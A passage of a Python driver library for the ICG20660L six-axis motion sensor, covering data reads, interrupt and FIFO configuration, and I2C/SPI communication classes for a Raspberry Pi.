Acceleration X-axis high byte data.\n @n The second byte of data: Acceleration X-axis low byte data.\n @n The third byte of data : Acceleration Y-axis high byte data.\n @n The 4th byte of data : Acceleration Y-axis low byte data.\n @n The 5th byte of data : Acceleration Y-axis high byte data.\n @n The 6th byte of data : Acceleration Z-axis low byte data.\n @n The 7th byte of data : Temperature high byte data.\n @n The 8th byte of data : Temperature low byte data.\n @n The 9th byte of data : Gyro X-axis high byte data.\n @n The 10th byte of data : Gyro X-axis low byte data.\n @n The 11th byte of data : Gyro Y-axis high byte data.\n @n The 12th byte of data : Gyro Y-axis low byte data.\n @n The 13th byte of data : Gyro Y-axis low byte data.\n @n The 14th byte of data : Gyro Z-axis high byte data.\n @note You can use RAW_DATA_LENGTH to creat data Arrya, and you can use \n @n RAW_DATA_AX_H_INDEX, RAW_DATA_AX_L_INDEX, RAW_DATA_AY_H_INDEX, RAW_DATA_AY_L_INDEX, RAW_DATA_AZ_H_INDEX, RAW_DATA_AZ_L_INDEX,\n @n RAW_DATA_T_H_INDEX, RAW_DATA_T_L_INDEX,RAW_DATA_GX_H_INDEX, RAW_DATA_GX_L_INDEX, \n @n RAW_DATA_GY_H_INDEX, RAW_DATA_GY_L_INDEX, RAW_DATA_GZ_H_INDEX, RAW_DATA_GZ_L_INDEX or 0~13 to index data array.\n '''\n self._raw_data = [0]*self.RAW_DATA_LENGTH\n if self._data_mode == self.eFIFO_MODE:\n self._read_data_from_fifo()\n else:\n self._read_data_from_reg()\n self._update = 0x7F\n return self._raw_data[0:length]\n\n def get_sensor_data(self):\n '''!\n @brief Get Sensor's accel, gyro and temperature data.\n @return Dictionary format: {'accel':{'x':0, 'y':0, 'z':0}, 'gyro':{'x':0, 'y':0, 'z':0}, 'temp':0.0}\n '''\n self.get_raw_data()\n sensor = {'accel':{'x':0.0, 'y':0.0, 'z':0.0}, 'gyro':{'x':0.0, 'y':0.0, 'z':0.0}, 'temp':0.0}\n sensor['accel']['x'] = self._cal_value(self._raw_data[self.RAW_DATA_AX_H_INDEX], self._raw_data[self.RAW_DATA_AX_L_INDEX])/self._accel_scale\n sensor['accel']['y'] = self._cal_value(self._raw_data[self.RAW_DATA_AY_H_INDEX], self._raw_data[self.RAW_DATA_AY_L_INDEX])/self._accel_scale\n sensor['accel']['z'] = self._cal_value(self._raw_data[self.RAW_DATA_AZ_H_INDEX], self._raw_data[self.RAW_DATA_AZ_L_INDEX])/self._accel_scale\n \n sensor['gyro']['x'] = self._cal_value(self._raw_data[self.RAW_DATA_GX_H_INDEX], self._raw_data[self.RAW_DATA_GX_L_INDEX])/self._gyro_scale\n sensor['gyro']['y'] = self._cal_value(self._raw_data[self.RAW_DATA_GY_H_INDEX], self._raw_data[self.RAW_DATA_GY_L_INDEX])/self._gyro_scale\n sensor['gyro']['z'] = self._cal_value(self._raw_data[self.RAW_DATA_GZ_H_INDEX], self._raw_data[self.RAW_DATA_GZ_L_INDEX])/self._gyro_scale\n \n sensor['temp'] = self._cal_value(self._raw_data[self.RAW_DATA_T_H_INDEX], self._raw_data[self.RAW_DATA_T_L_INDEX])/326.8 + 25\n self._update = 0\n return sensor\n\n def get_accel_x(self):\n '''!\n @brief Get X axis acceleration, unit g.\n @return X axis acceleration.\n '''\n if self._update & 0x01 == 0:\n self.get_raw_data()\n self._update &= 0xFE\n return self._cal_value(self._raw_data[self.RAW_DATA_AX_H_INDEX], self._raw_data[self.RAW_DATA_AX_L_INDEX])/self._accel_scale\n\n def get_accel_y(self):\n '''!\n @brief Get Y axis acceleration, unit g.\n @return y axis acceleration.\n '''\n if self._update & 0x02 == 0:\n self.get_raw_data()\n self._update &= 0xFD\n return self._cal_value(self._raw_data[self.RAW_DATA_AY_H_INDEX], self._raw_data[self.RAW_DATA_AY_L_INDEX])/self._accel_scale\n\n def get_accel_z(self):\n '''!\n @brief Get Z axis acceleration, unit g.\n @return Z axis acceleration.\n '''\n if self._update & 0x04 == 0:\n self.get_raw_data()\n self._update &= 0xFB\n return self._cal_value(self._raw_data[self.RAW_DATA_AZ_H_INDEX], self._raw_data[self.RAW_DATA_AZ_L_INDEX])/self._accel_scale\n \n def get_temperature_c(self):\n '''!\n @brief Get temperature data, uint: ℃.\n @return Temperature data.\n '''\n if self._update & 0x08 == 0:\n self.get_raw_data()\n self._update &= 0xF7\n return self._cal_value(self._raw_data[self.RAW_DATA_T_H_INDEX], self._raw_data[self.RAW_DATA_T_L_INDEX])/326.8 + 25\n \n def get_gyro_x(self):\n '''!\n @brief Get X-axis gyroscope speed, unit dps.\n @return X-axis gyroscope speed.\n '''\n if self._update & 0x10 == 0:\n self.get_raw_data()\n self._update &= 0xEF\n\n return self._cal_value(self._raw_data[self.RAW_DATA_GX_H_INDEX], self._raw_data[self.RAW_DATA_GX_L_INDEX])/self._gyro_scale\n\n def get_gyro_y(self):\n '''!\n @brief Get Y-axis gyroscope speed, unit dps.\n @return Y-axis gyroscope speed.\n '''\n if self._update & 0x20 == 0:\n self.get_raw_data()\n self._update &= 0xDF\n return self._cal_value(self._raw_data[self.RAW_DATA_GY_H_INDEX], self._raw_data[self.RAW_DATA_GY_L_INDEX])/self._gyro_scale\n\n def get_gyro_z(self):\n '''!\n @brief Get z-axis gyroscope speed, unit dps.\n @return z-axis gyroscope speed.\n '''\n if self._update & 0x40 == 0:\n self.get_raw_data()\n self._update &= 0xBF\n return self._cal_value(self._raw_data[self.RAW_DATA_GZ_H_INDEX], self._raw_data[self.RAW_DATA_GZ_L_INDEX])/self._gyro_scale\n\n def set_int_pin_motion_trigger_polarity(self, polarity):\n '''!\n @brief Set the level polarity of the INT pin when the accelerometer sensor is triggered to wake up the motion interrupt.\n @param polarity: the level signal of the sensor INT pin when the wake-up motion is triggered\n @n GPIO.HIGH: The initial signal of the pin is LOW. When an accelerometer wake-up motion occurs, the level signal of the INT pin will change to HIGH. \n @n Then the readINTStatus function needs to be called to clear the signal and restore the initial signal.\n @n GPIO.LOW: The initial signal of the pin is HIGH. When an accelerometer wake-up motion occurs, the level signal of the INT pin will change to LOW.\n @n Then the readINTStatus function needs to be called to clear the signal and restore the initial signal.\n @note After triggering the accelerometer wake-up motion, if the read_int_status function is not called to clear the sign, \n @n the INT pin will always maintain the level polarity when the motion is triggered.\n '''\n acl_rslt = self._read_bytes(self.REG_ICG20660L_ACCEL_CONFIG2, 1)\n acl_rslt = self._update_reg_bit_value(acl_rslt[0], self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 2)\n self._write_bytes(self.REG_ICG20660L_ACCEL_CONFIG2, [acl_rslt])\n self._level = polarity\n pin_rslt = self._read_bytes(self.REG_ICG20660L_INT_PIN_CFG, 1)\n \n if polarity == GPIO.HIGH:\n pin_rslt = self._update_reg_bit_value(pin_rslt[0], self.BIT_INT_LEVEL, self.OFFSET_INT_LEVEL, 0)\n else:\n pin_rslt = self._update_reg_bit_value(pin_rslt[0], self.BIT_INT_LEVEL, self.OFFSET_INT_LEVEL, 1)\n pin_rslt = self._update_reg_bit_value(pin_rslt, self.BIT_INT_OPEN, self.OFFSET_INT_OPEN, 0)\n pin_rslt = self._update_reg_bit_value(pin_rslt, self.BIT_LATCH_INT_EN, self.OFFSET_LATCH_INT_EN, 1)\n self._write_bytes(self.REG_ICG20660L_INT_PIN_CFG, [pin_rslt])\n \n irq_rslt = self._read_bytes(self.REG_ICG20660L_INT_ENABLE, 1)\n irq_rslt = self._update_reg_bit_value(irq_rslt[0], self.BIT_WOM_EN, self.OFFSET_WOM_EN, 7)\n irq_rslt = self._update_reg_bit_value(irq_rslt, self.BIT_DATA_RDY_INT_EN, self.OFFSET_DATA_RDY_INT_EN, 0)\n self._write_bytes(self.REG_ICG20660L_INT_ENABLE, [irq_rslt])\n time.sleep(1)\n \n itel_rslt = self._read_bytes(self.REG_ICG20660L_ACCEL_INTEL_CTRL, 1)\n itel_rslt = self._update_reg_bit_value(itel_rslt[0], self.BIT_ACCEL_INTEL_EN, self.OFFSET_ACCEL_INTEL_EN, 1)\n itel_rslt = self._update_reg_bit_value(itel_rslt, self.BIT_WOM_TH_MODE, self.OFFSET_WOM_TH_MODE, 1)\n itel_rslt = self._update_reg_bit_value(itel_rslt, self.BIT_ACCEL_INTEL_MODE, self.OFFSET_ACCEL_INTEL_MODE, 1)\n self._write_bytes(self.REG_ICG20660L_ACCEL_INTEL_CTRL, [itel_rslt])\n\n def set_wake_on_motion_thread_for_accel(self, level):\n '''!\n @brief Set the threshold value for the Wake on Motion Interrupt for accelerometer. \n @param level: WoM thresholds are expressed in fixed “mg” independent of the selected Range [0g : 1g]; Resolution 1g/256=~3.9mg\n @n level = 0~255\n @return Actul WoM thresholds, unit : g re_value = (level * 3.9)/1000 g\n '''\n g = (level * 3.9)/1000.0\n self._write_bytes(self.REG_ICG20660L_ACCEL_WOM_THR, [level])\n\n def get_int_pin_motion_trigger_polarity(self):\n '''!\n @brief @brief Get the polarity of the INT pin of sensor when the sensor INT pin triggers an interrupt.\n @return The level signal when the INT pin triggers an interrupt.\n @n GPIO.HIGH: INT pin level held HIGH LEVEL until interrupt status is cleared.\n @n GPIO.LOW: INT pin level held LOW LEVEL until interrupt status is cleared.\n '''\n return self._level\n \n def read_int_status(self):\n '''!\n @brief Read interrupt status register, and clear INT pin's interrupt signal. \n @return Interrupt status register value.\n @n INT_STATUS register:addr:0x3A,acess:rw\n @n ------------------------------------------------------------------------------------\n @n | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n @n ------------------------------------------------------------------------------------\n @n | WOM_XYZ_INT | FIFO_OFLOW_INT | rsv | DATA_RDY_INT |\n @n ------------------------------------------------------------------------------------\n @n DATA_RDY_INT : This bit automatically sets to 1 when a Data Ready interrupt is generated. The bit clears to 0 after the register has been read.\n @n rsv : reserve\n @n FIFO_OFLOW_INT: This bit automatically sets to 1 when a FIFO buffer overflow has been generated. The bit clears to 0 after the register has been read.\n @n WOM_XYZ_INT : These bits automatically set to a non-zero number when the X-axis,Y-axis or Z-axis of accelerometer which trigger WOM(wake on motion) \n @n interrupt.Cleared on Read.\n '''\n rslt = self._read_bytes(self.REG_ICG20660L_INT_STATUS, 1)\n return rslt[0]\n \n def _cal_value(self, h, l):\n value = 0\n if h & 0x80:\n h &= 0x7F\n value = -((~((h <<8) | l)) & 0x7fff)\n else:\n value = (h <<8) | l\n return value\n\n def _update_reg_bit_value(self, reg_value, bit, offset, value):\n #print(\"reg_value = %#x, bit = %d, offset = %#x, value = %#x\"%(reg_value,bit,offset, value))\n reg_value &= ((~(offset << bit)) & 0xFF)\n #print(\"reg_value1 = %#x\"%reg_value)\n reg_value |= (value << bit)\n #print(\"reg_value2 = %#x\"%reg_value)\n return reg_value & 0xFF\n\n def _get_reg_bit_value(self, reg_value, bit, offset):\n #print(\"reg_value = %#x, bit = %d, offset = %#x\"%(reg_value,bit,offset))\n reg_value >>= bit\n #print(\"reg_value1 = %#x\"%reg_value)\n reg_value &= offset\n #print(\"reg_value2 = %#x\"%reg_value)\n return reg_value & 0xFF\n \n def _select_clock_source(self, clk):\n rslt = self._read_bytes(self.REG_ICG20660L_PWR_MGMT_1, 1)\n if len(rslt) == 1:\n rslt = self._update_reg_bit_value(rslt[0], self.BIT_CLKSEL, self.OFFSET_CLKSEL, clk)\n else:\n return None\n self._write_bytes(self.REG_ICG20660L_PWR_MGMT_1, [rslt])\n time.sleep(1)\n \n def _enable_fifo(self, temp, gx, gy, gz, accel):\n rslt_fifo_en = self._read_bytes(self.REG_ICG20660L_FIFO_EN, 1)\n rslt_usr = self._read_bytes(self.REG_ICG20660L_USER_CTRL, 1)\n rslt_cfg = self._read_bytes(self.REG_ICG20660L_CONFIG, 1)\n \n if temp or gx or gy or gz or accel:\n rslt_usr = self._update_reg_bit_value(rslt_usr[0], self.BIT_FIFO_EN, self.OFFSET_FIFO_EN, 1)\n rslt_usr = self._update_reg_bit_value(rslt_usr, self.BIT_FIFO_RST, self.OFFSET_FIFO_RST, 1)\n rslt_usr = self._update_reg_bit_value(rslt_usr, self.BIT_SIG_COND_RST, self.OFFSET_SIG_COND_RST, 1)\n rslt_cfg = self._update_reg_bit_value(rslt_cfg[0], self.BIT_FIFO_MODE, self.OFFSET_FIFO_MODE, 0)\n else:\n rslt_usr = self._update_reg_bit_value(rslt_usr[0], self.BIT_FIFO_EN, self.OFFSET_FIFO_EN, 0)\n rslt_usr = self._update_reg_bit_value(rslt_usr, self.BIT_FIFO_RST, self.OFFSET_FIFO_RST, 1)\n rslt_usr = self._update_reg_bit_value(rslt_usr, self.BIT_SIG_COND_RST, self.OFFSET_SIG_COND_RST, 1)\n rslt_cfg = self._update_reg_bit_value(rslt_cfg[0], self.BIT_FIFO_MODE, self.OFFSET_FIFO_MODE, 0)\n rslt_fifo_en = self._update_reg_bit_value(rslt_fifo_en[0], self.BIT_ACCEL_FIFO_EN, self.OFFSET_ACCEL_FIFO_EN, accel)\n rslt_fifo_en = self._update_reg_bit_value(rslt_fifo_en, self.BIT_ZG_FIFO_EN, self.OFFSET_ZG_FIFO_EN, gz)\n slt_fifo_en = self._update_reg_bit_value(rslt_fifo_en, self.BIT_YG_FIFO_EN, self.OFFSET_YG_FIFO_EN, gy)\n slt_fifo_en = self._update_reg_bit_value(rslt_fifo_en, self.BIT_XG_FIFO_EN, self.OFFSET_XG_FIFO_EN, gx)\n slt_fifo_en = self._update_reg_bit_value(rslt_fifo_en, self.BIT_TEMP_FIFO_EN, self.OFFSET_TEMP_FIFO_EN, temp)\n self._write_bytes(self.REG_ICG20660L_FIFO_EN, [slt_fifo_en])\n rslt_fifo_en = self._read_bytes(self.REG_ICG20660L_FIFO_EN, 1)\n temp = self._get_reg_bit_value(rslt_fifo_en[0], self.BIT_TEMP_FIFO_EN, self.OFFSET_TEMP_FIFO_EN)\n gx = self._get_reg_bit_value(rslt_fifo_en[0], self.BIT_XG_FIFO_EN, self.OFFSET_XG_FIFO_EN)\n gy = self._get_reg_bit_value(rslt_fifo_en[0], self.BIT_YG_FIFO_EN, self.OFFSET_YG_FIFO_EN)\n gz = self._get_reg_bit_value(rslt_fifo_en[0], self.BIT_ZG_FIFO_EN, self.OFFSET_ZG_FIFO_EN)\n accel = self._get_reg_bit_value(rslt_fifo_en[0], self.BIT_ACCEL_FIFO_EN, self.OFFSET_ZG_FIFO_EN)\n self._fifo_frame_size = accel*6 + (temp+gx+gy+gz)*2\n \n def _set_full_scale_for_gyro(self, scale):\n scale &= 0x03\n rslt = self._read_bytes(self.REG_ICG20660L_GYRO_CONFIG, 1)\n rslt = self._update_reg_bit_value(rslt[0], self.BIT_XG_ST, self.OFFSET_XG_ST, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_YG_ST, self.OFFSET_YG_ST, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_ZG_ST, self.OFFSET_ZG_ST, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_FS_SEL, self.OFFSET_FS_SEL, scale)\n self._write_bytes(self.REG_ICG20660L_GYRO_CONFIG, [rslt])\n if scale == self.eFSR_G_125DPS:\n self._gyro_range = self.GYRO_FULL_SCALE_125DPS\n elif scale == self.eFSR_G_250DPS:\n self._gyro_range = self.GYRO_FULL_SCALE_250DPS\n elif scale == self.eFSR_G_500DPS:\n self._gyro_range = self.GYRO_FULL_SCALE_500DPS\n self._gyro_scale = self.ADC_MAX_RANGE/self._gyro_range\n\n def _set_bandwidth_for_gyro(self, bd):\n rslt_gyro = self._read_bytes(self.REG_ICG20660L_GYRO_CONFIG, 1)\n rslt = self._read_bytes(self.REG_ICG20660L_CONFIG, 1)\n rslt_gyro = self._update_reg_bit_value(rslt_gyro[0], self.BIT_FCHOICE_B, self.OFFSET_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt[0], self.BIT_DLPF_CFG, self.OFFSET_DLPF_CFG, 0)\n\n if bd == self.eGYRO_DLPF_8173_32KHZ:\n rslt_gyro = self._update_reg_bit_value(rslt_gyro, self.BIT_FCHOICE_B, self.OFFSET_FCHOICE_B, 1)\n\n elif bd == self.eGYRO_DLPF_3281_32KHZ:\n rslt_gyro = self._update_reg_bit_value(rslt_gyro, self.BIT_FCHOICE_B, self.OFFSET_FCHOICE_B, 2)\n\n elif bd == self.eGYRO_DLPF_250_8KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_DLPF_CFG, self.OFFSET_DLPF_CFG, 0)\n\n elif bd == self.eGYRO_DLPF_176_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_DLPF_CFG, self.OFFSET_DLPF_CFG, 1)\n\n elif bd == self.eGYRO_DLPF_92_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_DLPF_CFG, self.OFFSET_DLPF_CFG, 2)\n\n elif bd == self.eGYRO_DLPF_3281_8KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_DLPF_CFG, self.OFFSET_DLPF_CFG, 7)\n\n #print(type(rslt))\n #print(rslt)\n #print(type(rslt_gyro))\n #print(rslt_gyro)\n #print(\"rslt_gyro=%#x,rslt=%#x\"%(rslt_gyro, rslt))\n self._write_bytes(self.REG_ICG20660L_GYRO_CONFIG, [rslt_gyro])\n self._write_bytes(self.REG_ICG20660L_CONFIG, [rslt])\n rslt_gyro = self._read_bytes(self.REG_ICG20660L_GYRO_CONFIG, 1)\n rslt = self._read_bytes(self.REG_ICG20660L_CONFIG, 1)\n #print(\"rslt_gyro=%#x,rslt=%#x\"%(rslt_gyro[0], rslt[0]))\n\n def _set_full_scale_for_accel(self, scale):\n scale &= 0x03\n rslt = self._read_bytes(self.REG_ICG20660L_ACCEL_CONFIG, 1)\n rslt = self._update_reg_bit_value(rslt[0], self.BIT_XA_ST, self.OFFSET_XA_ST, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_YA_ST, self.OFFSET_YA_ST, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_ZA_ST, self.OFFSET_ZA_ST, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FS_SEL, self.OFFSET_ACCEL_FS_SEL, scale)\n self._write_bytes(self.REG_ICG20660L_ACCEL_CONFIG, [rslt])\n if scale == self.eFSR_A_2G:\n self._accel_range = self.ACCEL_FULL_SCALE_2G\n elif scale == self.eFSR_A_4G:\n self._accel_range = self.ACCEL_FULL_SCALE_4G\n elif scale == self.eFSR_A_8G:\n self._accel_range = self.ACCEL_FULL_SCALE_8G\n elif scale == self.eFSR_A_16G:\n _accel_range = self.ACCEL_FULL_SCALE_16G\n self.accel_scale = self.ADC_MAX_RANGE/self._accel_range\n\n def _set_bandwidth_for_accel(self, bd):\n rslt = self._read_bytes(self.REG_ICG20660L_PWR_MGMT_1, 1)\n if self._mode == self.eACCEL_LOW_POWER_MODE:\n rslt = self._update_reg_bit_value(rslt[0], self.BIT_CYCLE, self.OFFSET_CYCLE, 1)\n self._set_bandwidth_for_accel_in_low_power_mode(bd)\n elif self._mode == self.eSIX_AXIS_LOW_NOISE_MODE:\n rslt = self._update_reg_bit_value(rslt[0], self.BIT_CYCLE, self.OFFSET_CYCLE, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_GYRO_STANDBY, self.OFFSET_GYRO_STANDBY, 0)\n self._set_bandwidth_for_accel_in_others_mode(bd)\n self._write_bytes(self.REG_ICG20660L_PWR_MGMT_1, [rslt])\n\n def _set_bandwidth_for_accel_in_others_mode(self, bd):\n rslt = self._read_bytes(self.REG_ICG20660L_ACCEL_CONFIG2, 1)\n rslt = self._update_reg_bit_value(rslt[0], self.BIT_FIFO_SIZE, self.OFFSET_FIFO_SIZE, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_DEC2_CFG, self.OFFSET_DEC2_CFG, 0)\n if bd == self.eACCEL_DLPF_5_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 6)\n elif bd == self.eACCEL_DLPF_10_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 5)\n elif bd == self.eACCEL_DLPF_21_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 4)\n elif bd == self.eACCEL_DLPF_44_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 3)\n elif bd == self.eACCEL_DLPF_99_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 2)\n elif bd == self.eACCEL_DLPF_218_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 1)\n elif bd == self.eACCEL_DLPF_420_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 7)\n elif bd == self.eACCEL_DLPF_1046_4KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 1)\n self._write_bytes(self.REG_ICG20660L_ACCEL_CONFIG2, [rslt])\n\n def _set_bandwidth_for_accel_in_low_power_mode(self, bd):\n rslt = self._read_bytes(self.REG_ICG20660L_ACCEL_CONFIG2, 1)\n rslt = self._update_reg_bit_value(rslt[0], self.BIT_FIFO_SIZE, self.OFFSET_FIFO_SIZE, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_DEC2_CFG, self.OFFSET_DEC2_CFG, 0)\n if bd == self.eACCEL_DLPF_218_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 7)\n rslt = self._update_reg_bit_value(rslt, self.BIT_DEC2_CFG, self.OFFSET_DEC2_CFG, 1)\n elif bd == self.eACCEL_DLPF_420_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 7)\n rslt = self._update_reg_bit_value(rslt, self.BIT_DEC2_CFG, self.OFFSET_DEC2_CFG, 0)\n elif bd == self.eACCEL_DLPF_55_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 7)\n rslt = self._update_reg_bit_value(rslt, self.BIT_DEC2_CFG, self.OFFSET_DEC2_CFG, 3)\n elif bd == self.eACCEL_DLPF_110_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 7)\n rslt = self._update_reg_bit_value(rslt, self.BIT_DEC2_CFG, self.OFFSET_DEC2_CFG, 2)\n self._write_bytes(self.REG_ICG20660L_ACCEL_CONFIG2, [rslt])\n \n def _read_data_from_fifo(self):\n rslt_fifo = self._read_bytes(self.REG_ICG20660L_FIFO_EN, 1)\n val = self._read_bytes(self.REG_ICG20660L_FIFO_COUNTH, 2)\n val = (((val[0] & 0x1F) << 8)&0xffff) | val[1]\n count = 0\n if val >= self._fifo_frame_size:\n rslt = self._read_bytes(self.REG_ICG20660L_FIFO_R_W, self._fifo_frame_size)\n if self._get_reg_bit_value(rslt_fifo[0], self.BIT_TEMP_FIFO_EN, self.OFFSET_TEMP_FIFO_EN) and count < self._fifo_frame_size:\n self._raw_data[self.RAW_DATA_T_H_INDEX] = rslt[count]\n self._raw_data[self.RAW_DATA_T_L_INDEX] = rslt[count+1]\n count += 2\n if self._get_reg_bit_value(rslt_fifo[0], self.BIT_XG_FIFO_EN, self.OFFSET_XG_FIFO_EN) and count < self._fifo_frame_size:\n self._raw_data[self.RAW_DATA_GX_H_INDEX] = rslt[count]\n self._raw_data[self.RAW_DATA_GX_L_INDEX] = rslt[count+1]\n count += 2\n if self._get_reg_bit_value(rslt_fifo[0], self.BIT_YG_FIFO_EN, self.OFFSET_YG_FIFO_EN) and count < self._fifo_frame_size:\n self._raw_data[self.RAW_DATA_GY_H_INDEX] = rslt[count]\n self._raw_data[self.RAW_DATA_GY_L_INDEX] = rslt[count+1]\n count += 2\n if self._get_reg_bit_value(rslt_fifo[0], self.BIT_ZG_FIFO_EN, self.OFFSET_ZG_FIFO_EN) and count < self._fifo_frame_size:\n self._raw_data[self.RAW_DATA_GZ_H_INDEX] = rslt[count]\n self._raw_data[self.RAW_DATA_GZ_L_INDEX] = rslt[count+1]\n count += 2\n if self._get_reg_bit_value(rslt_fifo[0], self.BIT_ACCEL_FIFO_EN, self.OFFSET_ACCEL_FIFO_EN) and count < self._fifo_frame_size:\n self._raw_data[self.RAW_DATA_AX_H_INDEX] = rslt[count]\n self._raw_data[self.RAW_DATA_AX_L_INDEX] = rslt[count+1]\n self._raw_data[self.RAW_DATA_AY_H_INDEX] = rslt[count+2]\n self._raw_data[self.RAW_DATA_AY_L_INDEX] = rslt[count+3]\n self._raw_data[self.RAW_DATA_AZ_H_INDEX] = rslt[count+4]\n self._raw_data[self.RAW_DATA_AZ_L_INDEX] = rslt[count+5]\n count += 6\n \n def _read_data_from_reg(self):\n rslt = self._read_bytes(self.REG_ICG20660L_ACCEL_XOUT_H, self.RAW_DATA_LENGTH)\n #print(rslt)\n if len(rslt) == self.RAW_DATA_LENGTH:\n self._raw_data[self.RAW_DATA_AX_H_INDEX] = rslt[0]\n self._raw_data[self.RAW_DATA_AX_L_INDEX] = rslt[1]\n self._raw_data[self.RAW_DATA_AY_H_INDEX] = rslt[2]\n self._raw_data[self.RAW_DATA_AY_L_INDEX] = rslt[3]\n self._raw_data[self.RAW_DATA_AZ_H_INDEX] = rslt[4]\n self._raw_data[self.RAW_DATA_AZ_L_INDEX] = rslt[5]\n self._raw_data[self.RAW_DATA_T_H_INDEX] = rslt[6]\n self._raw_data[self.RAW_DATA_T_L_INDEX] = rslt[7]\n self._raw_data[self.RAW_DATA_GX_H_INDEX] = rslt[8]\n self._raw_data[self.RAW_DATA_GX_L_INDEX] = rslt[9]\n self._raw_data[self.RAW_DATA_GY_H_INDEX] = rslt[10]\n self._raw_data[self.RAW_DATA_GY_L_INDEX] = rslt[11]\n self._raw_data[self.RAW_DATA_GZ_H_INDEX] = rslt[12]\n self._raw_data[self.RAW_DATA_GZ_L_INDEX] = rslt[13]\n \n def _write_bytes(self, reg, buf):\n pass\n\n def _read_bytes(self, reg, length):\n pass\n\nclass DFRobot_ICG20660L_IIC(DFRobot_ICG20660L):\n def __init__(self,addr):\n '''!\n @brief The constructor of the ICG20660L sensor using IIC communication.\n @param addr: 7-bit IIC address, controlled by SDO pin.\n @n IIC_ADDR_SDO_H or 0x69: SDO pull high.(default)\n @n IIC_ADDR_SDO_L or 0x68: SDO pull down.\n '''\n self._addr = addr\n self._bus = smbus.SMBus(1)\n DFRobot_ICG20660L.__init__(self)\n\n\n def _write_bytes(self, reg, buf):\n try:\n self._bus.write_i2c_block_data(self._addr, reg, buf)\n except:\n pass\n\n def _read_bytes(self, reg, length):\n try:\n rslt = self._bus.read_i2c_block_data(self._addr, reg, length)\n return rslt\n except:\n return [0]*length\n\nclass DFRobot_ICG20660L_SPI(DFRobot_ICG20660L):\n def __init__(self, cs):\n '''!\n @brief The constructor of the ICG20660L sensor using SPI communication.\n @param cs: SPI chip select pin, connected to IO pin of raspberry pi.\n '''\n \n GPIO.setmode(GPIO.BCM)\n GPIO.setwarnings(False)\n self._cs = cs\n self._spi = spidev.SpiDev()\n self._spi.open(0,0)\n self._spi.no_cs = True\n self._spi.max_speed_hz = 7000000\n GPIO.setup(self._cs, GPIO.OUT)\n DFRobot_ICG20660L.__init__(self)\n\n def _write_bytes(self, reg, buf):\n try:\n self.set_cs_low()\n self._spi.writebytes([reg])\n self._spi.writebytes(buf)\n self.set_cs_high()\n except:\n pass\n\n def _read_bytes(self, reg, length):\n try:\n self.set_cs_low()\n reg |= 0x80\n self._spi.writebytes([reg])\n rslt = self._spi.readbytes(length)\n self.set_cs_high()\n return rslt\n except:\n return [0]*length\n\n def set_cs_low(self):\n GPIO.output(self._cs, GPIO.LOW)\n\n def set_cs_high(self):\n GPIO.output(self._cs, GPIO.HIGH)\n 